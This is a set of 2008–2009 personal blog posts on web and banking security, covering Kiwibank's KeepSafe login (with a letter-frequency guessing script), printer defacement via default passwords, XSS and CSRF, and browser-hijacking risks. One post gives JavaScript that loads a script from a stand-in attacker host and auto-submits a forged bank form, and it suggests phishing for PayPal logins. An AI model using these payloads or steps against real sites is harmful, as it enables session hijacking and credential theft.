BAZOMBO: a discursive miscellany of topics

Kiwibank’s KeepSafe feature, and ETAOIN SHRDLU

Friday, January 30 2009

Kiwibank have added a new step to their login process, called KeepSafe.

In this step, user knows the answer to a small range of questions they have selected, like “Where were you born” or “What’s your pet’s name?” And when they log in they are prompted with the questions and asked to select random letters from the answer (eg to select the 1st and 5th letters).

The aim is to defeat keyloggers. The user uses their mouse to select letters from a display of the alphabet, and they never type the whole answer, so an attacker who logged mouse clicks would have to capture multiple logins.

My guess is that password-stealing malware is common enough now that it poses a significant risk to banks.

Unfortunately for users, this system is quite inconvenient. It involves an unaccustomed degree of mental and physical dexterity to select the correct letters. It also is unaccessible for people with text only browsers, or who have Javascript turned off (ironically, the very people least likely to be vulnerable to malware).

A friend suggested that their Keepsafe answer would be “Keepsafe is bloody annoying”. This inspired me. I realise now that the savvier user will set all their Keepsafe answers to AAAAAAAAAAAA.

I also wonder whether it wouldn’t be reasonably easy to guess Keepsafe answers. If I were a wily hacker, I’d use my dictionary to compile stats of the most common letters in English words, by word length and position in the word. Let’s see.

#!/usr/bin/python

import string

f = file('/usr/share/dict/words')

counts = [{'all':0},{'all':0},{'all':0},{'all':0},{'all':0},{'all':0}]

# snag all 6 letter words
for line in [l.lower().strip() for l in f.readlines() if len(l) == 7]:
    for i in range(6):
        # count the letters in position i
        letter = line[i]
        counts[i][letter] = counts[i].get(letter, 0) + 1
        # keep a total so we can compute a percentage easily
        counts[i]['all'] = counts[i]['all'] + 1
        
for pos in range(6):
    print "Position %d" % (pos + 1)
    tops = {}
    for letter in string.lowercase:
        tops[letter] = counts[pos].get(letter,0)*100/counts[pos]['all']
    # take the top ten most frequent letters
    for pair in sorted(tops.iteritems(), key=lambda(k,v):(v,k), reverse=True)[0:9]:        
        print "%s %02.2f%%" % (pair[0], pair[1]),
    print

Results:

Position 1
s 11.00% c 7.00% b 7.00% p 6.00% m 6.00% t 5.00% r 5.00% d 5.00% a 5.00%
Position 2
a 18.00% o 15.00% e 13.00% i 10.00% u 9.00% r 7.00% l 5.00% n 3.00% h 3.00%
Position 3
r 10.00% a 9.00% n 8.00% l 7.00% s 6.00% o 6.00% i 6.00% t 5.00% e 5.00%
Position 4
i 10.00% e 10.00% t 8.00% a 7.00% n 6.00% l 6.00% o 5.00% s 4.00% r 4.00%
Position 5
e 27.00% n 7.00% l 6.00% a 5.00% t 4.00% r 4.00% o 4.00% i 4.00% u 2.00%
Position 6
s 36.00% d 11.00% e 9.00% r 8.00% y 6.00% n 5.00% t 4.00% g 3.00% a 3.00%

The distribution of letters is quite skewed, and you get three goes with Keepsafe, so a patient intruder could probably guess a substantial minority of answers.

I’m not sure what the end of this arms race will be.

no comments

Tags: security ~ kiwibank ~ python

Issues in authentication systems

Friday, November 14 2008

I have my own issues with biometric authentication systems, but this is not one I had foreseen.

To Whom it May concern: It has come to the attention of Recognition Systems that some people have a particular concern about using our hand scanners which relates to their religious beliefs. The concern revolves around the detection or placement of what is described in the Scriptures as “the mark of the Beast.”

Read the whole thing.

no comments

Tags: security ~ authentication ~ biometrics

Things to do for bored children at home

Wednesday, September 24 2008

1. Go to your networked printer’s administration page.
2. Identify some useful phrases.
3. Check the manual for the default password.
4. Google for unsecured printers on the internet.
5. Change their status message to something amusing.

NOTE: this is naughty and wrong. Do not do this. Unless it’s your parents’ printer.

(Interestingly, these things mostly seem to be at universities. I remember when I worked at a university, it was nigh impossible to forbid people to put unapproved hardware on the network. And as an admin there said to me, the purpose of the firewall was not to protect students from the world out there, but to save to the rest of the world from our students.)

no comments

Tags: security

Naughtiness in three easy steps.

Wednesday, August 20 2008

First, insert your code into a page from a.example.com. XSS via SQL injection is probably the right way.

var sc = document.createElement('script');
sc.setAttribute('type','text/javascript');
sc.setAttribute('src','http://b.example.com/naughty.js');
document.getElementsByTagName("head")[0].appendChild(sc);

Second, insert the code of your choice into the DOM from http://b.example.com/naughty.js. That’s a nice-to-have; you could have put this in the first script:

var badform = document.createElement('FORM');
document.body.appendChild(badform);
// ... add appropriate fields to badform here
badform.action="http://tastybank.example.com";
badform.method = "POST"; // note that existing cookies for tastybank in this session will be sent
var f = function () {badform.submit(); return false};
f(); // we could make this an event handler on one or more DOM elements so the user really does it to themselves

Third, um, er, PROFIT.

But we don’t have to go as far as POSTing to another site. For example, suppose on inspecting a user’s history we notice they visited their PayPal account earlier. Why not redirect to a fake PayPal screen, and ask them to log in again? Quite a large proportion of users will hand over their credentials. You can harvest them and then redirect to a real PayPal screen. The possibilities are endless.

Or you can just write a Flash applet with cute kittens and do anything you want from there—I hear the Flash sandbox is kind of lax, and how else will we order Hell Pizza?.

If you own TastyBank (or PayPal) the right thing to do is put signed unique tokens in all your forms and reject any forms that don’t have a valid token. Because there are more shitty PHP forum apps out there on popular sites than we will ever be able to track down and fix.

no comments

Tags: security ~ javascript ~ DOM

Protecting your goodies on the web is hard

Tuesday, August 19 2008

Update: for commenter Rob, the presentation that sparked this post centred on a demonstration of beef.

At work the other day an ex-employee who specialises in security gave us a presentation which could be summarised thus: if you want a safe, normal web-browsing experience, you are doomed. Your browser will be compromised, your secret details stolen, and your PC turned into a zombie. This is not merely possible, but likely, and ultimately inevitable.

The slightly longer summary could be turned into bullet points like this:

• Traditionally, security focussed on protecting servers, and assumed that clients were not desirable targets.
• This isn’t true. Your PC is a desirable target:
  • You use your PC to do things of interest (like online banking)
  • Your PC can be used to attack other PCs.
• Your browser runs code (JavaScript) from untrusted sources.
• Browsers carefully run this code in a “sandbox”, with no access to your computer’s disk or to memory outside the browser, in the belief that this will protect your PC from malicious code. This won’t work:
  • First, your browser can do interesting things like make naughty requests to hack into other PCs.
  • Second, there are plenty of things that you do care about in your brower’s memory (like your online banking session) which are totally accessible from within the sandbox  can be taken advantage of.
• Many sites (wrongly) allow users to inject Javascript into pages other people can see. That Javascript can seize control of your browser when you visit such a site. (This is called “cross-site scripting”).
• It is no use expecting sites you visit to protect you. Even when the owners are told about cross-site scripting problems, they often can’t be bothered fixing them. Among them are plenty of high-profile sites which you might well visit.
• That injected Javascript can:
  • “phone home” to a master server;
  • upload any data accessible from within the sandbox;
  • make naughty requests of other computers;
  • download further instructions from the master.
• There are already automated tools out there to do all this.
• Conclusion: any time you run a browser with Javascript on, and you visit a site with injected Javascript, your browser is no longer under your control. It will cough up details of any existing secure sessions and make requests elsewhere on behalf of its new controller. YOU ARE PWNED.

This is… disappointing. Much of the fun and even some of the utility of the modern web relies on the execution of Javascript. Is there any alternative to turning off Javascript?

There are some.

1. Use Firefox with the NoScript extension. This is probably ok for people who have the time and skill to evaluate scripts and decide for themselves whether they are safe to run.

2. Whenever you use a site to do secret stuff, close all browser sessions first. Then open a fresh one. As soon as you have finished what you are doing, close your browser again. This is a painful, error-prone practise to keep up; a stop-gap measure.

3. Use Prism, and only Prism, to run things that you care about. Prism is a standalone browser based on Firefox but with no menus, no location bar, and no tool bar. When you launch a Prism-hosted application, it will run in its own browser process, unconnected to any other browser sessions. So you install Prism and configure a launcher for your online banking, a launcher for your webmail, a launcher for your sharebroker, and so on. Your session can’t be hijacked unless an attacker has compromised the actual server hosting your application.

5 comments

Tags: security

Believing what people tell you

Thursday, August 14 2008

We never had a ZX Spectrum at home. After the ZX81, we got an Amstrad CPC 464. But still, those Spectrums were very popular, and I knew people who had them.

Amazingly, there are quite a few still out there serving web pages right now….

(And more seriously, there are a lot of Tomcat servers directly on the Internet. Tasty, vulnerable Tomcat servers.)

no comments

Tags: funny ~ security

One the one hand, on the other hand

Wednesday, July 30 2008

The newest versions of Firefox and IE are sticklers when it comes to SSL, which is why right now this second, you’ll see this message if you use Kiwibank’s online banking:

Secure Connection Failed
An error occurred during a connection to www.kiwibank.co.nz.

Peer’s Certificate has been revoked.

(Error code: sec_error_revoked_certificate)

Firefox is not very helpful at this point. With other SSL problems it will show you the certificate and how it was/was not verified. No such facility here.

According to the phone banking person I just talked to, the authority that issued their certificate assumed they were in the UK(!) and set various fields accordingly.

This is not good.

However, what was good was that my call was answered in about 30s, the person on the other end knew about the problem already, they had a reasonable explanation, and they had a suggested workaround. In these days of outsourced, scripted help desks, that’s pretty good indeed.

1 comment

Tags: security ~ firefox ~ kiwibank ~ support

---